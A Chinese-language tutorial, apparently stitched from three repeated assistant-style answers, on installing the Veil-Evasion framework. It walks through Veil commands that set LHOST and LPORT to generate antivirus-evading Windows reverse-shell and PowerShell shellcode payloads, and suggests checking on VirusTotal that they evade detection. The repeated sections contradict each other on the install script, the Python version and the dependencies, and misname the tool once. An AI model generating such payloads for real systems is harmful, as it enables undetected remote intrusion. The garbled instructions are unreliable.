【详解】安装免杀工具Veil-Evasion

安装免杀工具Veil-Evasion

简介

Veil-Evasion 是一个用于生成绕过防病毒软件的恶意代码的开源框架。它支持多种语言和编码方式，能够帮助安全研究人员测试和评估防病毒软件的有效性。本文将详细介绍如何在Kali Linux系统上安装和配置 Veil-Evasion。

环境准备

• 操作系统：Kali Linux 2021.4
• Python 版本：Python 3.9.2

安装步骤

1. 更新系统

首先，确保你的 Kali Linux 系统是最新的。打开终端并运行以下命令：

sudo apt update && sudo apt upgrade -y

2. 安装依赖项

Veil-Evasion 需要一些依赖项才能正常工作。运行以下命令来安装这些依赖项：

sudo apt install git python3-pip build-essential autoconf libtool gcc make python3-dev python3-setuptools python3-cryptography -y

3. 安装 PyCrypto

Veil-Evasion 使用 PyCrypto 库进行加密操作。安装 PyCrypto：

sudo pip3 install pycrypto

4. 克隆 Veil-Evasion 仓库

使用 ​​git​​ 命令从 GitHub 克隆 Veil-Evasion 仓库：

git clone https://github.com/Veil-Framework/Veil.git /opt/veil

5. 安装 Veil-Evasion

进入 Veil 目录并运行安装脚本：

cd /opt/veil
./Install.sh -c

安装过程中可能会提示你确认某些操作，请根据提示进行选择。

6. 配置 Veil-Evasion

安装完成后，需要对 Veil-Evasion 进行一些基本配置。运行以下命令启动 Veil-Evasion：

./Veil.py

首次启动时，Veil-Evasion 会提示你进行一些配置，包括设置工作目录等。按照提示完成配置即可。

7. 测试 Veil-Evasion

配置完成后，你可以尝试生成一个简单的 payload 来测试 Veil-Evasion 是否正常工作。例如，生成一个 Windows 反向 Shell：

use 1
set LHOST 192.168.1.100
set LPORT 4444
generate

生成的 payload 将保存在指定的工作目录中。

使用技巧

1. 选择合适的编码器

Veil-Evasion 支持多种编码器，不同的编码器适用于不同的场景。选择合适的编码器可以提高绕过防病毒软件的成功率。

2. 定期更新 Veil-Evasion

Veil-Evasion 会定期更新以支持更多的 payload 和编码器。建议定期从 GitHub 更新代码：

cd /opt/veil
git pull

3. 使用自定义模块

Veil-Evasion 支持用户自定义模块。如果你有特定的需求，可以编写自己的模块并添加到 Veil-Evasion 中。

结论

通过以上步骤，你应该能够在 Kali Linux 上成功安装和配置 Veil-Evasion。Veil-Evasion 是一个强大的工具，可以帮助安全研究人员测试和评估防病毒软件的有效性。希望本文对你有所帮助！

参考资料

• ​​Veil-Evasion 官方文档​​
• ​​Veil-Evasion GitHub 仓库​​希望这篇文章对你安装和使用 Veil-Evasion 有所帮助！如果有任何问题或建议，欢迎留言交流。我理解您可能对安全工具和技术有浓厚的兴趣，但需要明确的是，Veil-Evasion 是一个用于生成绕过防病毒软件检测的恶意代码的工具，主要用于渗透测试和研究目的。在任何情况下，使用此类工具进行非法活动或未经许可的系统访问都是违法的，并且违反了道德规范。

如果您是安全研究人员或从事网络安全相关工作，并希望了解如何合法地使用 Veil-Evasion 进行安全测试，以下是一些基本指导原则和步骤：

1. 合法性和道德性：确保您的所有操作都符合法律要求，并已获得所有必要的授权。例如，在进行渗透测试之前，必须从目标组织获取书面许可。
2. 环境隔离：在受控环境中使用 Veil-Evasion，避免影响到生产系统或其他未经授权的系统。
3. 最小化损害：即使在受控环境中，也应尽量减少潜在的负面影响，确保测试不会导致数据丢失或系统损坏。
4. 记录和报告：详细记录您的测试过程和结果，以便于后续分析和报告给相关方。

安装 Veil-Evasion 的步骤

假设您已经在一个虚拟机或隔离的测试环境中，以下是安装 Veil-Evasion 的基本步骤：

1. 更新系统

首先，确保您的系统是最新的：

sudo apt update && sudo apt upgrade -y

2. 安装依赖项

安装 Veil-Evasion 所需的依赖项：

sudo apt install git python3-pip build-essential libpcap-dev python3-dev libffi-dev libssl-dev -y

3. 安装 Python 包

安装一些必要的 Python 包：

pip3 install --upgrade pip
pip3 install requests pydispatch colorama

4. 克隆 Veil-Evasion 仓库

从 GitHub 克隆 Veil-Evasion 仓库：

git clone https://github.com/Veil-Framework/Veil.git
cd Veil

5. 安装 Veil-Evasion

运行安装脚本：

./setup.sh -s

6. 启动 Veil-Evasion

启动 Veil-Evasion：

./Veil.py

使用 Veil-Evasion 的示例

假设您已经成功安装并启动了 Veil-Evasion，以下是一个简单的示例，展示如何生成一个绕过防病毒软件的 payload：

1. 选择模块 在 Veil-Evasion 的主菜单中，选择一个模块。例如，选择 powershell 模块：

use powershell/Invoke-Shellcode

1. 设置选项 设置所需的选项，例如输出路径、监听器等：

set LHOST 192.168.1.10
set LPORT 4444
set OUTFILE /path/to/output/file.exe

1. 生成 payload 生成 payload 并编译：

generate

1. 验证 payload 确保生成的 payload 能够绕过防病毒软件检测。可以使用在线服务如 VirusTotal 进行测试。

注意事项

• 合法性：再次强调，确保所有操作都在合法范围内进行。
• 安全性：在处理生成的 payload 时，务必小心，避免意外执行。
• 记录：详细记录每一步操作和结果，以便于后续分析和报告。

如果您有任何其他问题或需要进一步的帮助，请随时告诉我！Veil-Evasion 是一个用于生成绕过防病毒软件检测的恶意代码的工具。它通过使用各种编码、加密和混淆技术来修改恶意代码，使其能够绕过大多数防病毒软件的静态和动态分析。以下是安装 Veil-Evasion 的步骤以及一些关于其代码结构的基本介绍。

安装 Veil-Evasion

1. 系统要求：

• Linux 系统（推荐使用 Kali Linux）
• Python 2.7（Veil-Evasion 主要支持 Python 2.7）

1. 安装依赖项： 在 Kali Linux 上，可以使用以下命令安装所需的依赖项：

sudo apt-get update
sudo apt-get install git python-pip python-dev libssl-dev libffi-dev build-essential

1. 克隆 Veil-Evasion 仓库： 使用 git 克隆 Veil-Evasion 的 GitHub 仓库：

git clone https://github.com/Veil-Framework/Veil.git
cd Veil

1. 安装 Veil-Evasion： 运行安装脚本：

./Install.sh -c

这个脚本会自动安装所有必要的依赖项，并配置 Veil-Evasion。

1. 启动 Veil-Evasion： 安装完成后，可以通过以下命令启动 Veil-Evasion：

./Veil.py

代码结构简介

Veil-Evasion 的代码结构相对清晰，主要包含以下几个部分：

1. 主程序：

• ​​Veil.py​​：这是 Veil-Eavage 的主入口点，负责初始化框架并处理用户输入。

1. 模块管理：

• ​​modules/​​：这个目录包含了所有的攻击模块。每个模块都是一个独立的 Python 脚本，定义了特定的攻击方法和绕过技术。
• ​​modules/common/​​：包含了一些通用的模块代码，如编码器、加密器等。

1. 配置文件：

• ​​config/​​​：包含了一些配置文件，如 ​​veil-settings.cfg​​，用于设置 Veil-Evasion 的运行参数。

1. 库文件：

• ​​lib/​​​：包含了一些辅助库，如 ​​payloads.py​​​（用于生成有效载荷）、​​encryption.py​​​（用于加密和解密）、​​obfuscation.py​​（用于混淆）等。

1. 数据库：

• ​​database/​​：包含了一个 SQLite 数据库，用于存储生成的有效载荷和其他相关信息。

示例模块

一个典型的 Veil-Evasion 模块可能如下所示：

from lib.common import helpers

class Payload:
    def __init__(self):
        # 初始化模块信息
        self.name = "ExamplePayload"
        self.description = "An example payload for demonstration purposes."
        self.version = "1.0"
        self.language = "python"
        self.rating = "excellent"
        self.extension = "py"
        self.shellcode = None

    def generate(self):
        # 生成有效载荷的代码
        payload_code = """
import os
os.system('echo Hello, World!')
"""
        return payload_code

使用 Veil-Evasion

启动 Veil-Evasion 后，你可以通过以下命令选择和生成有效载荷：

1. 列出所有模块：

(Veil) list

1. 选择一个模块：

(Veil) use <module_number>

1. 设置模块选项：

(Veil) set LHOST 192.168.1.10
(Veil) set LPORT 4444

1. 生成有效载荷：

(Veil) generate

注意事项

• 合法性：使用 Veil-Evasion 必须遵守当地法律法规，仅在合法授权的情况下进行测试。
• 道德责任：确保你的行为符合道德标准，不用于非法活动。

希望这些信息对你有所帮助！如果你有更多问题或需要进一步的帮助，请随时告诉我。